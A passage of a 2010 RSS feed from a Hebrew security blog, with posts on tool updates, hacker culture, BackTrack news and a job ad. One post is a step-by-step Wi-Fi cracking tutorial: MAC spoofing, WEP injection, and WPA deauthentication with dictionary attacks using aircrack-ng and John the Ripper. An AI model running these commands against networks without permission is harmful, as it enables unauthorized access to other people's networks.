		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1252</guid>
		<description><![CDATA[&#8235;חבר שלי, בוריס, פתח בלוג חדש בשם &#34;פורסים את הרשת&#34;.
בוריס חוקר מעולה וכבר בפוסט הראשון אפשר לראות שיהיה מעניין.
אם אתם בעניין של SECURITY, תוסיפו ל-RSSים שלכם.
אז מה ל-WALLA ולאתר סקס? לכו תקראו..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1252&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלי, בוריס, פתח בלוג חדש בשם &quot;<a href="http://www.borisgr.com/blog/" target="_blank">פורסים את הרשת</a>&quot;.</p>
<p>בוריס חוקר מעולה וכבר בפוסט הראשון אפשר לראות שיהיה מעניין.</p>
<p>אם אתם בעניין של SECURITY, תוסיפו ל-RSSים שלכם.</p>
<p>אז מה ל-WALLA ולאתר סקס? לכו <a href="http://www.borisgr.com/blog/archives/12" target="_blank">תקראו</a>..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1252&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1252/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;UPDATES&#8236;</title>		<link>http://guym.co.il/1250?nucrss=1</link>
		<comments>http://guym.co.il/1250#comments</comments>
		<pubDate>Fri, 29 Jan 2010 02:01:05 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1250</guid>
		<description><![CDATA[&#8235;1. גרסה חדשה ל-wireshark, 1.2.6.
2. גרסה חדשה ל-john the ripper 1.7.4.2.
3. גרסה חדשה ל-nmap 5.21.
ועוד עדכון קטן &#8211; אני בן 37  
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1250&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>1. גרסה חדשה ל-<a href="http://www.wireshark.org/" target="_blank">wireshark, 1.2.6</a>.</p>
<p>2. גרסה חדשה ל-<a href="http://www.openwall.com/john/" target="_blank">john the ripper 1.7.4.2</a>.</p>
<p>3. גרסה חדשה ל-<a href="http://nmap.org/download.html" target="_blank">nmap 5.21.</a></p>
<p>ועוד עדכון קטן &#8211; אני בן 37 <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1250&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1250/feed</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>&#8235;תרמית EasyPark?&#8236;</title>		<link>http://guym.co.il/1248?nucrss=1</link>
		<comments>http://guym.co.il/1248#comments</comments>
		<pubDate>Wed, 27 Jan 2010 22:39:49 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1248</guid>
		<description><![CDATA[&#8235;חבר שלח לי את הסרטון הזה. סרטון של למעלה מ-2 דקות אבל מכשיר האיזיפארק לא מוריד את הדקות האלה.
יש למישהו הסבר הגיוני או שאולי פשוט מצאו דרך נוחה לחנות בלי לקבל קנס?

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1248&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלח לי את הסרטון הזה. סרטון של למעלה מ-2 דקות אבל מכשיר האיזיפארק לא מוריד את הדקות האלה.</p>
<p>יש למישהו הסבר הגיוני או שאולי פשוט מצאו דרך נוחה לחנות בלי לקבל קנס?<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/v1Tmg_BjvxA&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/v1Tmg_BjvxA&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1248&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1248/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>&#8235;להיות האקר = להמציא את הגלגל מחדש?&#8236;</title>		<link>http://guym.co.il/1246?nucrss=1</link>
		<comments>http://guym.co.il/1246#comments</comments>
		<pubDate>Wed, 27 Jan 2010 16:07:54 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1246</guid>
		<description><![CDATA[&#8235;בעקבות הפוסט שלי על &#34;איך לפרוץ רשת אלחוטית&#34; קיבלתי בשתי מקומות שונים תגובה שזה מדריך לסקידיז.
קודם כל, אני חייב לציין שאף האקר אמיתי לא צריך את המדריך שלי כדי לייצר פריצה כזו ולכן יש בכך סוג של אמת. נכתבו עשרות מאמרים באנגלית שמסבירים את זה ואני מניח שהאקרים יודעים לקרוא.
המדריך שכתבתי לא מיועד להאקרים. הם [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1246&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בעקבות הפוסט שלי על &quot;<a href="http://guym.co.il/1240" target="_blank">איך לפרוץ רשת אלחוטית</a>&quot; קיבלתי בשתי מקומות שונים תגובה שזה מדריך לסקידיז.</p>
<p>קודם כל, אני חייב לציין שאף האקר אמיתי לא צריך את המדריך שלי כדי לייצר פריצה כזו ולכן יש בכך סוג של אמת. נכתבו עשרות מאמרים באנגלית שמסבירים את זה ואני מניח שהאקרים יודעים לקרוא.</p>
<p>המדריך שכתבתי לא מיועד להאקרים. הם יודעים להסתדר לבד.</p>
<p>המדריך  אמור להראות כמה קל לעשות את זה (וגם להפסיק את המיילים שאני מקבל פעמיים  בשבוע על איך עושים את זה).</p>
<p>הנקודה שרציתי להעלות היא קצת שונה.</p>
<p>אם מי שמשתמש בשיטות האלה הוא סקריפט קיד, מה אמור לעשות האקר &quot;אמיתי&quot;?</p>
<p>הרעיון הוא שאם אני משתמש בכלי מוכן אני סקריפט קיד ואם אני האקר אמיתי אסור לי להשתמש בכלי מוכן?</p>
<p>אני חייב להגיד שלדעתי אלה שטויות במיץ.</p>
<p>מי שחושב שהאקר נמדד בכך שהוא מפעיל כלים שרק הוא כתב או לא, תצפה לו אכזבה כיוון שאני לא מכיר אף האקר שיכול להגיד שהוא לא משתמש בכלים שכתבו אחרים(ותאמינו לי, אני מכיר את רוב ההאקרים הטובים ביותר בארץ וחלק מהטובים בעולם).</p>
<p>כן, גם האקרים &quot;אמיתיים&quot; משתמשים במערכות הפעלה שכתבו אחרים, בתוכנות שונות החל מאופיס (או אופן אופיס) דרך תוכנות כיווץ, תוכנות הצפנה ועוד הרבה דברים.</p>
<p>לגבי פריצת WIRELESS, גם ההאקרים הטובים ביותר בעולם משתמשים בכלים כמו aircrack פשוט כיוון שהכלי זמין ואין צורך להמציא מחדש את הגלגל בכל פעם.</p>
<p>ההבדל הוא שהאקר יבין איך הכלי עובד ולא ידקלם שורות הפעלה.</p>
<p>האקר יכול להשתמש בכלים שכתבו אחרים אם זה מקצר את הזמן שלוקח לו לעשות דברים. האישיות של האקר לא תיתן לו להשתמש בכלי לפני שהוא מבין טוב טוב מה הכלי עושה, איך הוא בנוי ואיזו חולשה הוא מנצל.</p>
<p>בקיצור, לנפץ מיתוסים: האקרים משתמשים בכלים מוכנים. גם ההאקרים הטובים ביותר.</p>
<p>לא כל מי שמשתמש בסקריפט/כלי שכתב מישהו אחר הוא סקידי.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1246&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1246/feed</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>&#8235;אז איך פורצים רשת אלחוטית?&#8236;</title>		<link>http://guym.co.il/1240?nucrss=1</link>
		<comments>http://guym.co.il/1240#comments</comments>
		<pubDate>Mon, 25 Jan 2010 06:12:36 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1240</guid>
		<description><![CDATA[&#8235;כיוון שאני עדיין מקבל את השאלה הזאת על בסיס קבוע.. אני אכתוב:
נתחיל בזה שהעניין כמובן בלתי חוקי אלא אם כן אתם מקבלים את רשותו של בעל הרשת ולכן כל המידע פה למטרות למידה.
כרטיס הרשת המומלץ הוא כרטיס מבוסס Atheros או Realtek, במקרה הזה אני משתמש ב-RT8187 והוא מעולה.
ניתן להשיג כרטיס כזה ב-DealExtreame פה:
http://www.dealextreme.com/details.dx/sku.20646
אם אתם רוצים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1240&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>כיוון שאני עדיין מקבל את השאלה הזאת על בסיס קבוע.. אני אכתוב:</p>
<p>נתחיל בזה שהעניין כמובן בלתי חוקי אלא אם כן אתם מקבלים את רשותו של בעל הרשת ולכן כל המידע פה למטרות למידה.</p>
<p>כרטיס הרשת המומלץ הוא כרטיס מבוסס Atheros או Realtek, במקרה הזה אני משתמש ב-RT8187 והוא מעולה.</p>
<p>ניתן להשיג כרטיס כזה ב-DealExtreame פה:</p>
<p><a href="http://www.dealextreme.com/details.dx/sku.20646" target="_blank">http://www.dealextreme.com/details.dx/sku.20646</a></p>
<p>אם אתם רוצים משהו איכותי יותר אפשר להשקיע בכרטיס ALFA שניתן להשיג ב-EBAY בכ-50$.</p>
<p style="text-align: left;">airmon-ng stop wlan0<br />
ifconfig wlan0 down<br />
macchanger &#8211;mac 00:11:22:33:44:55 wlan0</p>
<p style="text-align: right;">כל זה כדי להחליף את ה-MAC של כרטיס הרשת שלכם. לפריצה עצמה:</p>
<p style="text-align: right;">1. פריצת WEP עם Clients:</p>
<p style="text-align: left;">airmon-ng start wlan0<br />
airodump-ng wlan0<br />
airodump-ng -c (channel) -w (file name) &#8211;bssid (bssid) wlan0<br />
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0<br />
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0<br />
aircrack-ng -b (bssid) file name-01.cap</p>
<p style="text-align: right;">2. פריצה של WPA עם Clients ועם מילון מוכן:</p>
<p style="text-align: left;">airmon-ng start wlan0<br />
airodump-ng mon0<br />
airodump-ng mon0 &#8211;channel (channel) &#8211;bssid (bssid) -w /tmp/wpa<br />
aireplay-ng -0 1 -a (same-bssid) -c (mac) mon0<br />
aircrack-ng -w wordlist.txt  -b bssid /tmp/wpa*.cap</p>
<p style="text-align: right;">כמו שאתם מבינים, אנחנו צריכים מילון מוכן שיכיל בתוכו את המפתח.</p>
<p style="text-align: right;">יש הרבה מאוד בתים בארץ שהמפתח שלהם הוא מספר הטלפון או הסלולרי שלהם ולכן מילון שמכיל את כל הפרמוטציות של הספרות עד 10 תווים ייתן תוצאה לא רעה</p>
<p style="text-align: right;">למילון טוב יותר ניתן להשתמש ב-JOHN:</p>
<p style="text-align: left;" dir="ltr">/pentest/passwords/jtr/john &#8211;stdout &#8211;incremental:all &gt; wordlist.txt</p>
<p>שימו לב לעצור אותו כשהוא מגיע ל-10 תווים או כמה שרציתם להגיע..</p>
<p>מילון טוב (10 תווים של כל ה-ASCII) יכול להגיע למעל 200GB ככה שתדאגו שיש לכם מספיק מקום בשבילו.</p>
<p>יש פריצות מסובכות יותר שלא דורשות משתמש מחובר אבל למתחילים זה אמור להספיק <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1240&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1240/feed</wfw:commentRss>
		<slash:comments>21</slash:comments>
		</item>
		<item>
		<title>&#8235;כמה משפיעות השקות של מיקרוסופט על אבטחה בארגון?&#8236;</title>		<link>http://guym.co.il/1236?nucrss=1</link>
		<comments>http://guym.co.il/1236#comments</comments>
		<pubDate>Sun, 24 Jan 2010 13:14:28 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1236</guid>
		<description><![CDATA[&#8235;אין היום ארגון שלא כולל בתוכו מערכות מתוצרת Microsoft.
עד כמה משפיעות השקות של מוצרים חדשים על האבטחה בארגון?
זה ברור שהתשובה היא שיש קשר ישיר בין הטמעות של מוצרים חדשים לרמת האבטחה בארגון, אבל יש קשר גם להשקות עצמן? גם הארגון לא מתקין מוצר בעת ההשקה?
תחושת הבטן תגיד שזה ברור שכל עוד לא הטמענו מוצר בארגון [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1236&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אין היום ארגון שלא כולל בתוכו מערכות מתוצרת Microsoft.</p>
<p>עד כמה משפיעות השקות של מוצרים חדשים על האבטחה בארגון?</p>
<p>זה ברור שהתשובה היא שיש קשר ישיר בין הטמעות של מוצרים חדשים לרמת האבטחה בארגון, אבל יש קשר גם להשקות עצמן? גם הארגון לא מתקין מוצר בעת ההשקה?</p>
<p>תחושת הבטן תגיד שזה ברור שכל עוד לא הטמענו מוצר בארגון שלנו הוא לא ישפיע על האבטחה בארגון, אבל זאת יכולה להתגלות כטעות חמורה.</p>
<p>אני אתן דוגמאות תיאורטיות:</p>
<p>1. מיקרוסופט השיקה את Internet Explorer 8. רוב הארגונים לא רצים לשדרג אליו בשל מגוון סיבות הכוללות את עלות ההתקנה וההטמעה, שינויים נדרשים בתוכנות פנימיות ובאתרי אינטרהנט, זמן עבודה, תקלות וכ&quot;ו.</p>
<p>מצד שני, בבית אנשים קיבלו את העדכון באופן אוטומטי.</p>
<p>ה-IE החדש בטוח יותר ויודע להתמודד טוב יותר עם בעיות אבטחה הנוגעות לצד הלקוח. המשתמשים מוגנים יותר בבית ומתחילים לשנות הרגלי גלישה (באופן מודע או בלתי מודע) בהתאם לאיך שהדפדפן מגן עליהם.</p>
<p>עכשיו עם אותם הרגלים המשתמש מגיע אל הארגון ובו הדפדפן הישן והפחות מאובטח. יש כאן חשיפת המשתמש והארגון בו הוא עובד לבעיית אבטחה.</p>
<p>2. מהכיוון ההפוך:</p>
<p>עובד בבית הזמין &quot;טכנאי&quot; שהתקין לו מערכת הפעלה פרוצה.</p>
<p>העובד לומד שאסור לו לעדכן את אותה מערכת הפעלה כיוון ש-Microsoft מדי פעם חוסמים אותה עם WGA או צרות ורעות אחרות.</p>
<p>עם אותם ההרגלים העובד מגיע אל הארגון ומשתדל שלא לעדכן את המערכת (יש גם סיבות נוספות כמו: &quot;זה עובד אז למה לגעת?&quot; וכ&quot;ו).</p>
<p>שוב &#8211; הארגון נחשף לבעיות אבטחה.</p>
<p>* יש לציין שאם מראש אתם משאירים את האפשרויות בידי העובד זו בעית אבטחה בפני עצמה, אך לצורך הדיון נשאיר את ההחלטה בידיו.</p>
<p>ברור לנו שהארגון לא אמור להסתמך על &quot;המקצועיות&quot; של העובדים כדי להישאר מוגן, אך יש לזכור שהחלטות טכנולוגיות רבות עדיין בידי העובד.</p>
<p>מעניין לחשוב עד כמה הארגון חושף עצמו לבעיות בשל העובדה שאינו מספק כלים שלו לעבודה בטוחה בבית (ואולי זו הסיבה שיש ארגונים רבים שכן מספקים מערכות הפעלה חוקיות, אנטיוירוס וכ&quot;ו גם למחשבים בבתי העובדים).</p>
<p>בהמשך לכל זה אני רוצה להזכיר כנס שמיכל ממיקרוסופט סיפרה לי עליו:</p>
<p><a href="http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032439163&amp;culture=he-IL" target="_blank">http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032439163&amp;culture=he-IL</a></p>
<p>משהו מגניב שהולך להיות שם זה מעבדות התנסות עם מוצרים (וגם ארוחת בוקר, חשוב לא פחות <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ).</p>
<p>הייתי הולך אם לא הייתי עסוק ביום שלישי..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1236&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1236/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>&#8235;החוש השישי&#8236;</title>		<link>http://guym.co.il/1232?nucrss=1</link>
		<comments>http://guym.co.il/1232#comments</comments>
		<pubDate>Thu, 14 Jan 2010 14:23:58 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1232</guid>
		<description><![CDATA[&#8235;ממש אהבתי את זה:

<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1232&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>ממש אהבתי את זה:</p>
<p><!--copy and paste--><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="446" height="326" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="wmode" value="transparent" /><param name="bgColor" value="#ffffff" /><param name="flashvars" value="vu=http://video.ted.com/talks/dynamic/PranavMistry_2009I-medium.flv&amp;su=http://images.ted.com/images/ted/tedindex/embed-posters/PranavMistry-2009I.embed_thumbnail.jpg&amp;vw=432&amp;vh=240&amp;ap=0&amp;ti=685&amp;introDuration=16500&amp;adDuration=4000&amp;postAdDuration=2000&amp;adKeys=talk=pranav_mistry_the_thrilling_potential_of_sixthsense_tec;year=2009;theme=tales_of_invention;theme=the_creative_spark;theme=new_on_ted_com;theme=what_s_next_in_tech;theme=ted_under_30;theme=design_like_you_give_a_damn;theme=a_taste_of_tedindia;event=TEDIndia+2009;&amp;preAdTag=tconf.ted/embed;tile=1;sz=512x288;" /><param name="src" value="http://video.ted.com/assets/player/swf/EmbedPlayer.swf" /><param name="bgcolor" value="#ffffff" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="446" height="326" src="http://video.ted.com/assets/player/swf/EmbedPlayer.swf" flashvars="vu=http://video.ted.com/talks/dynamic/PranavMistry_2009I-medium.flv&amp;su=http://images.ted.com/images/ted/tedindex/embed-posters/PranavMistry-2009I.embed_thumbnail.jpg&amp;vw=432&amp;vh=240&amp;ap=0&amp;ti=685&amp;introDuration=16500&amp;adDuration=4000&amp;postAdDuration=2000&amp;adKeys=talk=pranav_mistry_the_thrilling_potential_of_sixthsense_tec;year=2009;theme=tales_of_invention;theme=the_creative_spark;theme=new_on_ted_com;theme=what_s_next_in_tech;theme=ted_under_30;theme=design_like_you_give_a_damn;theme=a_taste_of_tedindia;event=TEDIndia+2009;&amp;preAdTag=tconf.ted/embed;tile=1;sz=512x288;" bgcolor="#ffffff" wmode="transparent" allowfullscreen="true"></embed></object></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1232&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1232/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>&#8235;Back&#124;Track 4 &#8211; חדשות.&#8236;</title>		<link>http://guym.co.il/1228?nucrss=1</link>
		<comments>http://guym.co.il/1228#comments</comments>
		<pubDate>Wed, 13 Jan 2010 04:24:43 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1228</guid>
		<description><![CDATA[&#8235;שוחררה ההפצה הרשמית של Back&#124;Track4.ואפשר להוריד מפה:
http://www.backtrack-linux.org/downloads 
מה שיותר מעניין זה ש- remote-exploit ו-BackTrack זה כבר לא אותם חבר'ה.
MUTS (מתי אהרוני) פרש מ-remote-exploit והוא ממשיך לפתח את Back&#124;Track יחד עם אנשים מקהילת הפורומים.
יתר החבר'ה ב-remote-exploit החליטו שהם פורשים מפיתוח ההפצה וממשיכים במחקרים עצמאיים בתחום.
הם מתלוננים על כך שהקהילה גדלה מאוד ואין כבר הנאה בפיתוח ההפצה. [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1228&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>שוחררה ההפצה הרשמית של Back|Track4.ואפשר להוריד מפה:<br />
<a href="http://www.backtrack-linux.org/downloads " target="_blank">http://www.backtrack-linux.org/downloads </a></p>
<p>מה שיותר מעניין זה ש- remote-exploit ו-BackTrack זה כבר לא אותם חבר'ה.<br />
MUTS (מתי אהרוני) פרש מ-remote-exploit והוא ממשיך לפתח את Back|Track יחד עם אנשים מקהילת הפורומים.<br />
יתר החבר'ה ב-remote-exploit החליטו שהם פורשים מפיתוח ההפצה וממשיכים במחקרים עצמאיים בתחום.<br />
הם מתלוננים על כך שהקהילה גדלה מאוד ואין כבר הנאה בפיתוח ההפצה. הם רוצים לחזור לכיף (למחקר).</p>
<p>את BackTrack תוכלו למצוא פה: <a href="http://www.backtrack-linux.org " target="_blank">http://www.backtrack-linux.org </a>ואילו remote-exploit משחררים בדומיין הישן מחקרים שלהם.</p>
<p>מעניין מה יקרה ההמשך.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1228&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1228/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;הצעת עבודה להאקר או שניים&#8236;</title>		<link>http://guym.co.il/1222?nucrss=1</link>
		<comments>http://guym.co.il/1222#comments</comments>
		<pubDate>Wed, 06 Jan 2010 12:48:12 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1222</guid>
		<description><![CDATA[&#8235;היום דיבר איתי אדם חביב בשם מאור שמחפש להעסיק 1-2 האקרים (לעבודה רצינית, חבושים בכובע לבן   ).
הצעתי לו שאפרסם את ההצעה פה והוא אישר.

Founded in 2006, we are a low–profile technology &#38; consulting firm dedicated to the financial industry.
We help industry participants to accelerate the adoption of new technology, respond rapidly to market [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1222&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>היום דיבר איתי אדם חביב בשם מאור שמחפש להעסיק 1-2 האקרים (לעבודה רצינית, חבושים בכובע לבן <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ).</p>
<p>הצעתי לו שאפרסם את ההצעה פה והוא אישר.</p>
<p style="text-align: left;">
<p style="text-align: left;" dir="ltr">Founded in 2006, we are a low–profile technology &amp; consulting firm dedicated to the financial industry.</p>
<p style="text-align: left;" dir="ltr">We help industry participants to accelerate the adoption of new technology, respond rapidly to market conditions, and reduce costs through a large scale of best-of-breed products.</p>
<p style="text-align: left;">We are looking for 1-2 &quot;hackers&quot; that can be interested in Ethical-Hacking Activity. (A new service that we want to provide, related to <strong>Fraud Inspection </strong>&amp; prevention)</p>
<p style="text-align: left;" dir="ltr">Not a Must – But surely advantage: Existing knowledge in &#8211; Real time systems, low latency technologies, trading platforms, High Frequency Trading System Integration or other related &quot;stuff&quot; for Trading-Technologies.</p>
<p style="text-align: left;" dir="ltr">: Knowledge in <strong>Fraud Inspection </strong>&amp; prevention.</p>
<p style="text-align: left;" dir="ltr">Freelancers are also welcome.</p>
<p style="text-align: left;" dir="ltr">We Offer you to join our Team, with the opportunity to get access to cutting edge technologies &amp; important cpital market knowledge.</p>
<p style="text-align: left;" dir="ltr">Cheers,</p>
<p style="text-align: left;" dir="ltr">Maor (&quot;Okidoki&quot;) <a href="mailto:tasoftware25@gmail.com">tasoftware25@gmail.com</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1222&crtId=148&dt=1268434922"></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/1222/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;שנה חדשה &#8211; כתובת חדשה.&#8236;</title>		<link>http://guym.co.il/1218?nucrss=1</link>
		<comments>http://guym.co.il/1218#comments</comments>
		<pubDate>Fri, 01 Jan 2010 19:05:43 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1218</guid>
		<description><![CDATA[&#8235;לכבוד השנה החדשה הולכים להיות פה כמה שינויים.
אחד השינויים הוא שעברתי לשרת אחר, חזק ויציב יותר (תודה שחר   ).
שינוי נוסף הוא שהבלוג עובד לכתובת חדשה: http://www.guym.co.il.
כרגע שתי הכתובות עובדות, בקרוב אוסיף הפניית 301 מהכתובת הנוכחית לכתובת החדשה כדי שגוגל יתחיל לעבוד ולאנדקס אותה.
הסיבה למעבר לכתובת היא שהחלטתי שלא הוגן שלבלוג אישי אצרוך כתובת [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F1218&crtId=148&dt=1268434922">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לכבוד השנה החדשה הולכים להיות פה כמה שינויים.</p>
<p>אחד השינויים הוא שעברתי לשרת אחר, חזק ויציב יותר (תודה שחר <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ).</p>
<p>שינוי נוסף הוא שהבלוג עובד לכתובת חדשה: <a href="http://www.guym.co.il" target="_self">http://www.guym.co.il</a>.</p>
<p>כרגע שתי הכתובות עובדות, בקרוב אוסיף הפניית 301 מהכתובת הנוכחית לכתובת החדשה כדי שגוגל יתחיל לעבוד ולאנדקס אותה.</p>
